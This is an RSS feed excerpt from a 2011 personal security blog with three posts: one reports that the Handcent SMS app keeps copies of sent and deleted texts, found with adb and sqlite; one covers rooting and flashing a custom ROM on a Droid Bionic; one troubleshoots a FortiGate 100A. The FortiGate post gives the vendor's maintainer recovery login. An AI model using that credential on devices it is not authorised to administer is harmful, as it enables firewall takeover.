		<item>
		<title>Handcent SMS logs all your sent messages</title>
		<link>http://infolookup.securegossip.com/2011/12/18/handcent-sms-logs-all-your-send-messages/</link>
		<comments>http://infolookup.securegossip.com/2011/12/18/handcent-sms-logs-all-your-send-messages/#comments</comments>
		<pubDate>Sun, 18 Dec 2011 07:26:05 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[Infosec]]></category>
		<category><![CDATA[Infosec News]]></category>
		<category><![CDATA[Android Apps]]></category>
		<category><![CDATA[Android OS]]></category>
		<category><![CDATA[Handcent SMS]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[SEND_LOG]]></category>
		<category><![CDATA[SEND_LOG_DETAIL]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=663</guid>
		<description><![CDATA[In light of all the CarrierIQ press I started wondering what others applications on my phone might be doing things that I am not aware of. So I installed SQLite Editor and started poking around my phone, that&#8217;s when I decided to see what my sms client &#8220;Handcent&#8221; was up too. Since I wanted to [...]]]></description>
			<content:encoded><![CDATA[<p>In light of all the CarrierIQ press I started wondering what <a href="http://infolookup.securegossip.com/files/app_handcent_sms_logo.png"><img class="alignleft size-full wp-image-664" src="http://infolookup.securegossip.com/files/app_handcent_sms_logo.png" alt="" width="64" height="64" /></a>others applications on my phone might be doing things that I am not aware of. So I installed <a href="https://market.android.com/details?id=com.speedsoftware.sqleditor&amp;hl=en">SQLite Editor</a> and started poking around my phone, that&#8217;s when I decided to see what my sms client &#8220;Handcent&#8221; was up too. Since I wanted to view my out on a bigger monitor I fired up a adb shell and used SQLite see what Handcent sms was hiding under the hood.</p>
<p>I used the following command to search my /data/data folder on my device to look for any files with a .db extension since that indicated it was a database file.</p>
<blockquote><p><strong><span style="color: #008000"><code> adb shell find /data -name *.db</code></span></strong></p>
<p style="text-align: left"><a href="http://infolookup.securegossip.com/files/hancent-1.png"><img class="aligncenter size-medium wp-image-667" src="http://infolookup.securegossip.com/files/hancent-1-300x268.png" alt="" width="300" height="268" /></a><code>As you can see I found several databases on my phone but today<br />
we will be looking at one in particular. Handcent's "hc_sms.db".</code><code></code><strong></strong></p>
<p><a href="http://infolookup.securegossip.com/files/hc_sms.png"><img class="aligncenter size-medium wp-image-669" src="http://infolookup.securegossip.com/files/hc_sms-300x68.png" alt="" width="300" height="68" /></a><span style="color: #000000">F<code></code><strong><code>or this part we will use sqlite to view the database layout (schema)<br />
and its contents:</code></strong></span></p>
<p><span style="color: #008000">sqlite&gt; .schema</span><br />
<span style="color: #008000">CREATE TABLE DELIVERY_REPORT (MESSAGE_ID INTEGER Primary KEY,TIMESTAMP text,UPDATE_TIMESTAMP text);</span></p>
<p><span style="color: #008000">CREATE TABLE SEND_LOG (ID Integer Primary KEY,SID INTEGER ,SEND_TYPE INTEGER,BEGIN_SEND_TIME text,END_SEND_TIME text,SEND_CONTENT TEXT,</span><br />
<span style="color: #008000">SENDING_PERSON_NUBER INTEGER,SUCCESS_NUMBER INTEGER,FAIL_NUMBER INTEGER);</span></p>
<p><span style="color: #008000">CREATE TABLE SEND_LOG_DETAIL (SID INTEGER,PID INTEGER,BEGIN_SEND_TIME TEXT,END_SEND_TIME TEXT,PERSON_NAME TEXT,PERSON_NUMBER TEXT,SENDI</span><br />
<span style="color: #008000">NG_MESSAGE_NUMBER INTEGER,SENT_SUCCESS_NUMBER INTEGER,SENT_FAIL_NUMBER INTEGER);</span><br />
<span style="color: #008000">CREATE TABLE android_metadata (locale TEXT);</span></p>
<p><span style="color: #008000">sqlite&gt; .tables</span><br />
<span style="color: #008000">DELIVERY_REPORT   SEND_LOG          SEND_LOG_DETAIL   android_metadata</span><br />
<span style="color: #008000">sqlite&gt;</span></p></blockquote>
<p><a href="http://infolookup.securegossip.com/files/handcent_schema.png"><img class="aligncenter size-medium wp-image-670" src="http://infolookup.securegossip.com/files/handcent_schema-300x32.png" alt="" width="300" height="32" /></a></p>
<p><a href="http://infolookup.securegossip.com/files/handcent-tables.png"><img class="aligncenter size-medium wp-image-671" src="http://infolookup.securegossip.com/files/handcent-tables-300x38.png" alt="" width="300" height="38" /></a><strong></strong></p>
<blockquote><p><span style="color: #008000"><code><span style="color: #000000">And now afte</span></code></span><strong><span style="color: #008000"><code>r <span style="color: #000000">doing a</span> select * from SEND_LOG; <span style="color: #800000">to my amazement<br />
I saw all my text messages that were sent since I installed<br />
the handcent application both </span></code></span></strong><span style="color: #800000"><code>DELETED</code></span><strong><span style="color: #008000"><code><span style="color: #800000"> and undeleted</span>.<br />
</code></span></strong></p>
<p><strong><span style="color: #008000"><code><a href="http://infolookup.securegossip.com/files/SEND_LOG.png"><img class="aligncenter size-medium wp-image-673" src="http://infolookup.securegossip.com/files/SEND_LOG-300x27.png" alt="" width="300" height="27" /></a><span style="color: #000000">Also looking at</span> select * from SEND_LOG_DETAIL <span style="color: #000000">I saw the same<br />
information but this log also held the receiver of the sms name<br />
and phone number.</span></code></span></strong></p>
<p><strong><span style="color: #008000"><code><a href="http://infolookup.securegossip.com/files/SEND_LOG_DETAIL.png"><img class="aligncenter size-medium wp-image-674" src="http://infolookup.securegossip.com/files/SEND_LOG_DETAIL-300x40.png" alt="" width="300" height="40" /></a></code></span></strong><span style="color: #008000"><code><span style="color: #000000">Now my question is, if I am deleting a message and thinking<br />
its being deleted why would handcent chose to keep a copy of<br />
this message in an unencrypted database where anyone can access<br />
it? I would love to hear from them and try to understand why<br />
this is being done.</span></code></span><strong><span style="color: #008000"><code><br />
</code></span></strong></p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2011/12/18/handcent-sms-logs-all-your-send-messages/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>My first expirience at installing a custom rom</title>
		<link>http://infolookup.securegossip.com/2011/12/15/my-first-expirience-at/</link>
		<comments>http://infolookup.securegossip.com/2011/12/15/my-first-expirience-at/#comments</comments>
		<pubDate>Thu, 15 Dec 2011 21:38:00 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[How To's]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Random]]></category>
		<category><![CDATA[Android OS]]></category>
		<category><![CDATA[Droid Bionic]]></category>
		<category><![CDATA[Root]]></category>
		<category><![CDATA[Unbrick]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=652</guid>
		<description><![CDATA[  So after having my Droid Bionic for a few months now I have decided to take the leap from rooting to roming. A quick definition on Rooting and Roming from the nice people over at droidlessons.com: What is Rooting? “Rooting” your device means obtaining “superuser” rights and permissions to your Android’s software. With these [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://infolookup.securegossip.com/files/Android-Phone.png"><img class="alignleft size-medium wp-image-655" src="http://infolookup.securegossip.com/files/Android-Phone-273x300.png" alt="" width="148" height="134" /></a>  So after having my Droid Bionic for a few months now I have decided to take the leap from rooting to roming. A quick definition on Rooting and Roming from the nice people over at droidlessons.com:</p>
<p><strong>What is Rooting?</strong></p>
<p>“Rooting” your device means obtaining “superuser” rights and permissions to your Android’s software. With these elevated user privileges, you gain the ability to load custom software (ROM’s), install custom themes, increase performance, increase battery life, and the ability to install software that would otherwise cost extra money (ex: WiFi tethering). Rooting is essentially “hacking” your Android device. In the iPhone world, this would be the equivalent to “Jailbreaking” your phone.</p>
<p><strong>Custom Software (ROM’s)</strong></p>
<p>You may have heard of people loading custom “ROM’s” on their devices. A “ROM” is the software that runs your device. It is stored in the “Read Only Memory” of your device. There are many great custom ROM’s available that can make your Android device look and perform drastically different.</p>
<p>After hanging around<a href="http://rootzwiki.com" target="_blank"> rootzwiki</a> forum, listening to <a href="http://feeds.feedburner.com/droidnationmp3" target="_blank">Droid Nation </a>and <a href="http://podnutz.com/aaa" target="_blank">Android App Addicts</a>podcast I felt like I was ready to install my first custom  rom. My rom of choice was <a href="http://rootzwiki.com/topic/11382-rom-kin3tx-v10-120811/" target="_blank">[K]IN3TX v1.0</a> some features about this rom:</p>
<ul>
<li><strong>Latest BusyBox</strong></li>
<li><strong>Superuser (Updated Binary)<br />
</strong></li>
<li><strong>Battery Optimization</strong></li>
<li><strong>Fully ROOTED</strong></li>
<li><strong>SD Card Read tweaks</strong><strong></strong></li>
<li><strong>Built Off of 5.8.894 OTA</strong><strong><br />
</strong></li>
<li><strong>Advance Power Menu</strong><strong></strong></li>
<li><strong>Scrollable Power Toggles in Pull Down</strong><strong></strong></li>
<li><strong>FULL Custom UI</strong><strong></strong></li>
<li><strong>PNG Optimization</strong><strong></strong></li>
<li><strong>init.d Run Support</strong></li>
</ul>
<p>Just to name a few..</p>
<p>You can read the full posting about this rom over at the <a href="http://rootzwiki.com/topic/11382-rom-kin3tx-v10-120811/" target="_blank">rootzwiki</a> forum their you will also find the various downloads that you would need. However I will highlight a few steps I took:</p>
<ul>
<li><a href="http://rootzwiki.com/topic/5484-r3l3as3droot-and-43v3r-root-for-the-bionic-v21/" target="_blank">Root your device</a></li>
<li><a href="http://rootzwiki.com/topic/4732-guide-how-to-install-clockworkmod-recovery/" target="_blank">Install clockworkmod recovery </a></li>
<li><a title="External link" href="https://market.android.com/details?id=com.keramidas.TitaniumBackupPro&amp;hl=en" rel="nofollow external">Install Titanium backup pro</a> or MyBackup root (backup your apps and data)</li>
<li>***COPY THE ROM TO YOUR SD CARD***</li>
<li>Boot into recovery mode with CWM while there do the following</li>
<ul>
<li><strong>WIPE DATA/FACTORY RESET</strong></li>
<li><strong>WIPE CACHE</strong></li>
<li><strong>UNDER MOUNTS AND STORAGE, FORMAT SYSTEM</strong></li>
<li><strong>UNDER ADVANCED, WIPE DALVIK</strong></li>
<li><strong>INSTALL AND HAVE FUN!</strong></li>
</ul>
</ul>
<p>After you are finish installing log-in setup your device, then you can boot back into CWM wipe your cache, and dalvik then install add-on or tpak of your choice, I installed the ICS tpak.</p>
<p>Now as anyone might expect the first time you are doing something like this you have to realize that you might make a mistake, but you can only hope it doesn&#8217;t hurt you too much. The mistake I made was that I copied the wrong add-on pack to my sdcard but not the base rom, and since I already wiped my system partition I was unable to reboot my phone into recovery mode after I copied the correct file via another device.</p>
<p>How I corrected this issue you might ask yourself, I had some help from my buddy Highlander-:  over at the <a href="www.podnutz.com">Podnutz</a> IRC chat room. He pointed me to a tool call <a href="http://forum.xda-developers.com/showthread.php?t=1348587">RSDlite</a>, which allowed me to flash my phone back to the stock rom and from there I followed the steps outlined above and all was well the second time around <img src='http://infolookup.securegossip.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . You have got to love the power of the Internet and great communities.</p>
<p>Have fun roming and you can comment back and let me know which rom is your favorite. I have only tried one and I must say I absolutely love it!</p>
<p>Reference Links:</p>
<p><a href="http://droidlessons.com/what-is-rooting-on-android-the-advantages-and-disadvantages/">http://droidlessons.com/what-is-rooting-on-android-the-advantages-and-disadvantages/<br />
</a><a href="http://forum.xda-developers.com/showthread.php?t=1348587">http://forum.xda-developers.com/showthread.php?t=1348587</a><a href="http://droidlessons.com/what-is-rooting-on-android-the-advantages-and-disadvantages/"></p>
<p>http://www.addictivetips.com/mobile/unbrick-motorola-droid-bionic-with-rsd-lite-5-5-guide/</p>
<p></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2011/12/15/my-first-expirience-at/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Troubleshooting FortiGate 100A Connectivity Issue</title>
		<link>http://infolookup.securegossip.com/2011/12/06/troubleshooting-fortigate-100a-connectivity-issue/</link>
		<comments>http://infolookup.securegossip.com/2011/12/06/troubleshooting-fortigate-100a-connectivity-issue/#comments</comments>
		<pubDate>Tue, 06 Dec 2011 14:30:14 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[Firewall]]></category>
		<category><![CDATA[How To's]]></category>
		<category><![CDATA[Infosec]]></category>
		<category><![CDATA[Fortigate 100A]]></category>
		<category><![CDATA[HOWTO]]></category>
		<category><![CDATA[Troubleshooting]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=646</guid>
		<description><![CDATA[Objective:  I goal of this document is meant to outline a few steps that will allow you to troubleshoot the cause behind why users were unable to access the internet while behind a Fortigate 100A device. Problem: I received a ticket today stating that users in one our computer labs were unable to access the [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Objective</strong>:  I goal of this document is meant to outline a few steps that will allow you to troubleshoot the cause behind why users were unable to access the internet while behind a Fortigate 100A device.</p>
<p><strong>Problem</strong>: I received a ticket today stating that users in one our computer labs were unable to access the internet.</p>
<p>After arriving onsite I discounted the device and plugged directly into the ISP link and confirmed that they were no issues with the ISP connection. Now is time to open a ticket with support and start the series of troubleshooting to figure out the root cause of the issue.</p>
<p><strong>Step one: Information gathering</strong></p>
<p>After opening the ticket I was told that the issue could have possibly been caused by a bad firmware image, or a corrupted configuration. I needed to log into the device to find out more information and the only way to do so was via the console port.</p>
<p><strong>Connecting to the Fortigate 100A console port:</strong></p>
<ul>
<li>Start your favorite terminal emulator program use the following settings:</li>
<ul>
<li><strong>Baud rate</strong>: 9600</li>
<li><strong>Data bits</strong>: 8</li>
<li><strong>Parity</strong>: None</li>
<li><strong>Stop bit</strong>: 1</li>
<li><strong>Flow control:</strong> None</li>
</ul>
<li>Next, reboot the device and watch the screen for any error message.</li>
</ul>
<p>&nbsp;</p>
<p>After rebooting the first time I got the following message, <strong>“You must format the boot device”,</strong>  I then rebooted a second time and got the following message <strong>“The config file may contain errors, Please see details by the command &#8216;diagnose debug config-error-log read”.</strong>  This was somewhat good news because I would have had to RMA the device if the system RAM was corrupted.</p>
<p>At this point I know I had the following options:</p>
<ul>
<li>Backup the current configs</li>
<li>Reset the device to it’s default state</li>
<li>Reload a new configs</li>
</ul>
<p><strong>Backing up the device to USB via the console port:</strong></p>
<ul>
<li>Plug a usb device into one of the ports on the back of the device</li>
<li>Login to the device, if you are unable to use your admin login you can login with the maintainer account, this account is only valid for 30 sec after the device has been rebooted; so copy the username and password to a text file then cut/paste to the console. <span style="color: #008000"><strong>Username</strong>: maintainer <strong>Password: </strong>bcpb&lt;input device serial number using uppercase letters&gt;</span></li>
</ul>
<ul>
<li>Issue the following command: <strong><span style="color: #800000">execute backup configs usb filename&lt;use any name here&gt;</span><br />
<span style="color: #008000">FG100 # execute backup full-config usb fg100a-10-15-11</span><br />
<span style="color: #008000"> Please wait…</span><br />
<span style="color: #008000"> Copy onfigs fg100a-10-15-11 to USB disk …</span><br />
<span style="color: #008000"> Copy onfigs file to USB disk OK.</span><br />
<span style="color: #008000"> Setting timestamp</span></strong></li>
</ul>
<p>Before reloading a new configs its best to run a few diagnostic commands to try and understand what happened:</p>
<p><span style="color: #008000"><strong>FG100 #  diag sys top </strong></span><span style="color: #800000"><strong>&#8211;&gt; Look at CPU load and any processor that running hot</strong></span></p>
<p><span style="color: #008000"><strong>FG100 # diag debug crashlog </strong></span><span style="color: #800000"><strong>&#8211;&gt; Look for clues as to what service crashed</strong></span></p>
<p><span style="color: #800000"><strong>          Ex Output:</strong></span></p>
<p><span style="color: #008000"><strong>89: 2011-11-14 16:06:42 &lt;04434&gt; application cmdbsvr</strong></span></p>
<p><span style="color: #008000"><strong> 290: 2011-11-14 16:06:42 &lt;04434&gt; *** signal 7 (Bus error) received ***</strong></span></p>
<p><span style="color: #008000"><strong> 291: 2011-11-14 16:06:42 &lt;04434&gt; Register dump:</strong></span></p>
<p><span style="color: #008000"><strong>298: 2011-11-14 16:06:42 &lt;04434&gt; Backtrace:</strong></span></p>
<p><span style="color: #008000"><strong> 299: 2011-11-14 16:06:42 &lt;04434&gt; [0x0893277b] =&gt; /bin/cmdbsvr  </strong></span></p>
<p><span style="color: #008000"><strong> 300: 2011-11-14 16:06:42 &lt;04434&gt; [0x08932a96] =&gt; /bin/cmdbsvr  </strong></span></p>
<p><span style="color: #008000"><strong> 301: 2011-11-14 16:06:42 &lt;04434&gt; [0x08910473] =&gt; /bin/cmdbsvr  </strong></span></p>
<p><strong> </strong></p>
<p><strong>Reload new configs via console port:</strong></p>
<ul>
<li>Rename your most recent backup configs file to <strong>fgt_system.conf, </strong>then place file on the root of your USB drive.</li>
<li>Plug the USB into one of USB ports on the back of the unit and reboot the unit<strong> </strong>and you should see a similar output:</li>
</ul>
<p>&nbsp;</p>
<p><span style="color: #008000"><strong>Reading boot image 1370111 bytes.<br />
Initializing firewall&#8230;<br />
System is started.<br />
Get image from USB disk &#8230;Can not get image from USB disk.<br />
Get config file from USB disk OK.<br />
File check OK.</strong></span></p>
<p><span style="color: #008000"><strong>The system is going down NOW !!</strong></span></p>
<p><strong> </strong>If you are not certain and you leave the drive in after the system reboots you will see the following message indication that the configs file on the disk is the same as the file on the system.</p>
<p><strong> </strong><span style="color: #008000"><strong>Get config file from USB disk OK.<br />
Checksum check synced! Don&#8217;t need restore config.</strong></span></p>
<p>&nbsp;</p>
<p><strong> Additional Troubleshooting:</strong></p>
<p>After I restored the config file I was still unable to connect out to the internet, so I issued the following command to verify my IP address setting:</p>
<p><span style="color: #008000"><strong>FG100A # get system interface  </strong></span></p>
<p>After discovering that the IP address for my external interface <strong>WAN1</strong> had a different subnet than the one I wrote down previously when I connected directly to my ISP modem with my PC. I decided to change the interface type to DHCP.</p>
<p>&nbsp;</p>
<p><strong>Configuring external interface for DHCP:</strong></p>
<p><span style="color: #008000"><strong>FG100A #  configs system interface </strong><span style="color: #800000"><strong>&#8211;&gt; To enter into Interface config mode</strong></span></span></p>
<p><span style="color: #008000"><strong>FG100A (interface) # edit wan1 </strong><span style="color: #800000"><strong>&#8211;&gt; Choose your external interface in our case it was wan1</strong></span></span></p>
<p><span style="color: #008000"><strong>FG100A (wan1) # unset ip <span style="color: #800000">&#8211;&gt; </span></strong><span style="color: #800000"><strong> Removing current static IP entry</strong></span></span></p>
<p><span style="color: #008000"><strong>FG100A (wan1) # set mode dhcp </strong><strong>&#8211;&gt; To change mode to DHCP from static</strong></span></p>
<p><span style="color: #008000"><strong>FG100A (wan1) # show </strong><span style="color: #800000"><strong>&#8211;&gt; To confirm that the change was made</strong></span></span></p>
<p><span style="color: #008000"><strong>config system interface<br />
edit &#8220;wan1&#8243;<br />
set vdom &#8220;root&#8221;<br />
set mode dhcp<br />
set allowaccess https ssh fgfm<br />
set type physical<br />
next<br />
end</strong></span></p>
<p><strong> </strong><span style="color: #008000"><strong>FG100A (wan1) # end </strong></span></p>
<p><strong> I was now able to access the internet!!</strong></p>
<p><strong>Discovering what happened:</strong></p>
<p><span style="color: #800000"><strong>Wrap-up:</strong></span></p>
<p>Given that the logs were lost due the fact the FortiGate was reset and the unit is storing it&#8217;s logs in RAM, I can&#8217;t diagnose the exact cause. But we did see in the Crashlog &#8220;diag debug crashlog read&#8221;, which is written to flash that the cmdbsvr was crashing. We have identified a issue with cmdbsvr on the version of fortios on your fortigate.</p>
<p><strong>Bug #&#8217;s : 117281, 144277</strong><br />
Summary : cmdbsvr crash in conserve mode may cause configuration loss</p>
<p>I updated the device to MR3 patch 2, since this version addressed the issue.<br />
<strong>Reference Documentation:</strong></p>
<p><a href="http://emea.fortinet.net/fortinet/bht/index.php">http://emea.fortinet.net/fortinet/bht/index.php</a></p>
<p><a href="http://bit.ly/uRSdYJ">http://bit.ly/uRSdYJ</a></p>
<p><a href="http://docs.fortinet.com/fscan/fortiscan_cli_40.pdf">http://docs.fortinet.com/fscan/fortiscan_cli_40.pdf</a></p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2011/12/06/troubleshooting-fortigate-100a-connectivity-issue/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

